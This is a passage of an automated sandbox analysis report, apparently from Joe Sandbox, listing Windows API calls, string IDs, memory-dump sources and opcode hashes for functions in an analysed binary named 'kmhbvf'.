                                                                  • Opcode Fuzzy Hash: c9bab3b7839d3fffa8158b537ffef6dc77ee7464e7ef4c6559384733a32d6eb0
                                                                  • Instruction Fuzzy Hash: F6019273E4012D7BD214A511AC82FFF739C9A60394B058125FE06A6741E760DE15A2E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F35075
                                                                  • __beginthreadex.LIBCMT ref: 00F35093
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00F350A8
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F350BE
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F350C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 3824534824-0
                                                                  • Opcode ID: 298ff62feba7b1404df202bd5aa73381f46dcb8e9f689c182670027edebd4dbd
                                                                  • Instruction ID: 22b5b318f13c031237941c9fd29f3f53b76b59129411566e8cef84db602ec30f
                                                                  • Opcode Fuzzy Hash: 298ff62feba7b1404df202bd5aa73381f46dcb8e9f689c182670027edebd4dbd
                                                                  • Instruction Fuzzy Hash: 69110CB291470D7BC7019BA89C04A9B7BACAB86730F140256F824D3350D6B289009BF1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32 ref: 00F28E3C
                                                                  • GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
                                                                  • HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
                                                                  • GetUserObjectSecurity.USER32 ref: 00F28E73
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: 4f568c7a74875eb5507e12f13575f03759bd064bf45d3712e01a1a7c6be9c7b5
                                                                  • Instruction ID: 5a1a6eee732755e06f60f46eab33a3a1acf15215e8ce54eb34f9a0faacec1847
                                                                  • Opcode Fuzzy Hash: 4f568c7a74875eb5507e12f13575f03759bd064bf45d3712e01a1a7c6be9c7b5
                                                                  • Instruction Fuzzy Hash: 5F018670601218BFDB104FE5EC48D6B7FADEF863A5B200529F859C2220DF729C11EA60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F3581B
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F35829
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35831
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F3583B
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 4ebf69f02108ff4786e5d4bcdd11b89571ef53a607117ce71f1ebd296ede7b83
                                                                  • Instruction ID: cf1541c86b1b727ab49d298c49be1c5734d278b91596251dc1df5484500eda2b
                                                                  • Opcode Fuzzy Hash: 4ebf69f02108ff4786e5d4bcdd11b89571ef53a607117ce71f1ebd296ede7b83
                                                                  • Instruction Fuzzy Hash: FD016931C01A1DDBCF009FE8DD48AEEBBB8FB49B21F114556E411B2140CF709550EBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?,?,00F28073), ref: 00F27D45
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D60
                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D6E
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?), ref: 00F27D7E
                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27C62,80070057,?,?), ref: 00F27D8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: beb3513c4553070e3b052f84f1e6ef42c60803d68a32d9b9b63984a768d19cf8
                                                                  • Instruction ID: bd6431c2f14902d463a429ba7b4ce5d7e5efeb75ce0fcf6ee5694fee168ae41f
                                                                  • Opcode Fuzzy Hash: beb3513c4553070e3b052f84f1e6ef42c60803d68a32d9b9b63984a768d19cf8
                                                                  • Instruction Fuzzy Hash: A2017176A05328ABDB119F64EC44BAA7BADEF44762F644014F908D7210DBB1DD00EBE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F28CDE
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F28CE8
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F28CF7
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F28CFE
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F28D14
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: f03f1d4ba1b0dd0f0d8f43301b444d0aaec58393b5667581cf558d4c3455f948
                                                                  • Instruction ID: 423ce5833d864c29dff4cee8c1e624df6c18d30295b1ee4b89a8405fd2d1b82d
                                                                  • Opcode Fuzzy Hash: f03f1d4ba1b0dd0f0d8f43301b444d0aaec58393b5667581cf558d4c3455f948
                                                                  • Instruction Fuzzy Hash: A7F0AF30201218BFEB100FA4AC89EA73BACEF4A7A4B604425F904C2190CEA19C05FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28D3F
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D49
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D58
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D5F
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D75
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 4e51bc2cb15a229ad42d4e54a3c655945a6a45778d65332af56ba8798fbb6386
                                                                  • Instruction ID: 6f0a21f7125c71a04db896f38fd618da273fc4602118f974af8301faf5bd0f22
                                                                  • Opcode Fuzzy Hash: 4e51bc2cb15a229ad42d4e54a3c655945a6a45778d65332af56ba8798fbb6386
                                                                  • Instruction Fuzzy Hash: 9FF0AF30211218BFEB110FA4EC88F673BACEF4A7A4F640115F954C2290CFA19D06FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 176edc0deccc96836d451339de4cc61c2241750c99c90871405c25eb4f84ce0f
                                                                  • Instruction ID: c5761b4613d3149afb35b2fb94fc1c7d3f133637291959aec070d6ccc6a551a6
                                                                  • Opcode Fuzzy Hash: 176edc0deccc96836d451339de4cc61c2241750c99c90871405c25eb4f84ce0f
                                                                  • Instruction Fuzzy Hash: EC01DB31500718ABEB205B14ED4EB977B78FB00711F400669F5A3A10E1DFF1A954ABD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 00ED179B
                                                                  • StrokeAndFillPath.GDI32(?,?,00F0BBC9,00000000,?), ref: 00ED17B7
                                                                  • SelectObject.GDI32(?,00000000), ref: 00ED17CA
                                                                  • DeleteObject.GDI32 ref: 00ED17DD
                                                                  • StrokePath.GDI32(?), ref: 00ED17F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: 1652b9fec5e693b84b39d0a1e5bf89767e379816679fba7277e47c8449f4b472
                                                                  • Instruction ID: 0f1411b44ad70d8730e5bc7acab61aacd1bb96567623604fdc2d8239a12ceb4e
                                                                  • Opcode Fuzzy Hash: 1652b9fec5e693b84b39d0a1e5bf89767e379816679fba7277e47c8449f4b472
                                                                  • Instruction Fuzzy Hash: E3F0C93041834CBBDB116F25ED4C75A3FA4EB0132AF249256F429552F0CB714996EF10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 00F3CA75
                                                                  • CoCreateInstance.OLE32(00F63D3C,00000000,00000001,00F63BAC,?), ref: 00F3CA8D
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • CoUninitialize.OLE32 ref: 00F3CCFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                  • String ID: .lnk
                                                                  • API String ID: 2683427295-24824748
                                                                  • Opcode ID: 5f7ca730784fd4e670f52a566c1951b00c07c397aabcf20d37a2924b5ed48da3
                                                                  • Instruction ID: 34a80f7a0cc8008d9fa75c5573243d76e15d0cc3b35e27eb0379d04f3125d759
                                                                  • Opcode Fuzzy Hash: 5f7ca730784fd4e670f52a566c1951b00c07c397aabcf20d37a2924b5ed48da3
                                                                  • Instruction Fuzzy Hash: 1FA14CB1504205AFD300EF64CC81EAFB7E8EF94714F10595DF155A72A2EB70EA4ACB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
                                                                    • Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00EE1680: _memmove.LIBCMT ref: 00EE16DB
                                                                  • __swprintf.LIBCMT ref: 00EDE598
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EDE431
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 1943609520-557222456
                                                                  • Opcode ID: adf11077b262f5a5006f0886cd3363483c31d2c29bd5d04d6819a51433967ad9
                                                                  • Instruction ID: 8a39b5b0927fb4e76d35e6efe77eb371ce4fdeeb8da44145cc1ae751f8cb8d75
                                                                  • Opcode Fuzzy Hash: adf11077b262f5a5006f0886cd3363483c31d2c29bd5d04d6819a51433967ad9
                                                                  • Instruction Fuzzy Hash: 0E91BA725082459FC714EF24C895C6EB7E8EF95700F00195EF496AB3A1EA30EE85CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00EF52CD
                                                                    • Part of subcall function 00F00320: __87except.LIBCMT ref: 00F0035B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: 13ab969f8a5e980d0dbbc6c0abcb1630470d0c4e575c113407a425ec4ae1e53b
                                                                  • Instruction ID: d25e3745735acf27ac906e00c3fdab55179d1d881c9d253e4a1ccb1e5151c291
                                                                  • Opcode Fuzzy Hash: 13ab969f8a5e980d0dbbc6c0abcb1630470d0c4e575c113407a425ec4ae1e53b
                                                                  • Instruction Fuzzy Hash: 5E519E27E09A0D97DB11AB18CD0137A3BA49B50750F305E68E7D1561F9EE788CC4BB46
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$+
                                                                  • API String ID: 0-2552117581
                                                                  • Opcode ID: 566a80f5a78010a98a5851a6c430a8a9574aa9ae15d4fe3f83b7091203c445d5
                                                                  • Instruction ID: 37525ca3d8cc925a407894b53d9054ac1417ca17b26767f2ec3c12254a297964
                                                                  • Opcode Fuzzy Hash: 566a80f5a78010a98a5851a6c430a8a9574aa9ae15d4fe3f83b7091203c445d5
                                                                  • Instruction Fuzzy Hash: D85125759002A9CFDF15EF28D440AFA7BA0EF55324F244095ED91EB2D1D734AC82DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_free
                                                                  • String ID: #V
                                                                  • API String ID: 2620147621-3658881132
                                                                  • Opcode ID: c913e16924aa6f9d81a03d2b42b88848438a01ff112331f50c605408ca086921
                                                                  • Instruction ID: 8ae79a2f04ee5b48fbd03863ddcaf19345a2ad0cdb1a3b39d16618e9ba986699
                                                                  • Opcode Fuzzy Hash: c913e16924aa6f9d81a03d2b42b88848438a01ff112331f50c605408ca086921
                                                                  • Instruction Fuzzy Hash: 3C516A716087418FDB24DF28C485B6EB7E1FF85714F44592EE5899B351E731E842CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$_memmove
                                                                  • String ID: ERCP
                                                                  • API String ID: 2532777613-1384759551
                                                                  • Opcode ID: 303903c2d8faa24828812779dd36e4f4ed33b4c5a75aad71a456d85c42cdab18
                                                                  • Instruction ID: 46caa90e0b23d3f134e4d946901d570b8baef631f8f8c69b71bdc3111bc30cbb
                                                                  • Opcode Fuzzy Hash: 303903c2d8faa24828812779dd36e4f4ed33b4c5a75aad71a456d85c42cdab18
                                                                  • Instruction Fuzzy Hash: CC51D2B1A0434D9BCB24DF65C8907EABBF5FF04314F24956EE54AEB241E7309682CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F31CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29E4E,?,?,00000034,00000800,?,00000034), ref: 00F31CE5
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F2A3F7
                                                                    • Part of subcall function 00F31C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00F31CB0
                                                                    • Part of subcall function 00F31BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00F31C08
                                                                    • Part of subcall function 00F31BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F29E12,00000034,?,?,00001004,00000000,00000000), ref: 00F31C18
                                                                    • Part of subcall function 00F31BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F29E12,00000034,?,?,00001004,00000000,00000000), ref: 00F31C2E
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F2A464
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F2A4B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 58947fef9aaeb5936fcec846c656d83c1b27231821953d76006f7e6a557ec598
                                                                  • Instruction ID: fee82926e963878ad135390f1a84ac47b38e31cc0d9f1931a75215b26289292f
                                                                  • Opcode Fuzzy Hash: 58947fef9aaeb5936fcec846c656d83c1b27231821953d76006f7e6a557ec598
                                                                  • Instruction Fuzzy Hash: 11415C7290022CBFCB10DFA4CD85ADEBBB8EF45350F104095FA55B7190DA71AE85DBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
